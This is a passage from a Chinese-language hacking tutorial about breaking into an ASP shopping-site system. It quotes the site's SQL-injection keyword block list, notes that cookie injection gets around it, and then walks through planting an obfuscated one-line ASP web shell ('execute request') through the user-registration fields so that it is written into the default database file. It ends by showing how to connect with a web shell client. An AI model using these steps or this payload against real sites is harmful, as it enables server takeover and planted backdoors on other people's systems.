|
3、突破防注入文件的限制:cookie的注入
·防注入代码分析
相关文件:在inc/Check_Sql.asp防注入文件中部分代码:
以下是代码片段:
Dim Query_Badword,Form_Badword,i,Err_Message,Err_Web,name'---定义部份头
Err_Message = 1 '处理方式:1=提示信息,2=转向页面,3=先提示再转向
Err_Web = "Err.Asp" '出错时转向的页面
Query_Badword="'∥and∥select∥update∥chr∥delete∥%20from∥;∥insert∥mid∥master.∥set∥chr(37)∥="
'在这部份定义get非法参数,使用"∥"号间隔
Form_Badword="'∥%∥&∥*∥#∥(∥)∥=" '在这部份定义post非法参数,使用"∥"号间隔
'------定义部份 尾-----------------------------------------------------------------------
'………..略过一部分
%> |
·防注入程序只对request.QueryString和request.form集合提交的数据进行了过滤,在没有指定哪种集合来获取数据的情况下,这样就产生cookie的注入漏洞了。cookie的注入比较烦,具体的注入过程大家可以按照网上提供的cookie注入步骤来操作(这儿就略过了,大家可以到华夏论坛搜索相关资料)
三、终极漏洞利用
·在前台插入一句话的利用
这类系统的默认数据库名为” #wrtxcn2007.asp”,里面没有防插入的代码,虽然在程序在对提交量做了相应的过滤,但我们是可以在前台提交时插入加密的一句话,从而写入到系统的数据库中,这儿我就分别从”注册用户”和客户留言”二个方面来讲讲一句话的插入和利用方法.(利用的前提是默认的数据名没有改变)
(1):先进入用户注册的页面,在注册用户里的”公司名称”和”收货人地址”处写入加密的一句话马”┼攠數畣整爠煥敵瑳∨≡┩>”(就是<% execute request("a")%>加密过的),如图8:(小编注:这个加密使用的是lack2的ANSI2Unicode加密软件,本站软件频道已经提供下载,大家可以到soft.77169.com搜索下载)
(图8)
提交后,我们看到小马已经完整插入到数据库,图9:
(图9)
再打开一句话马的客户端,提交后,成功得到一个小马如图10,图11:
(图10)
上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] 下一页 |
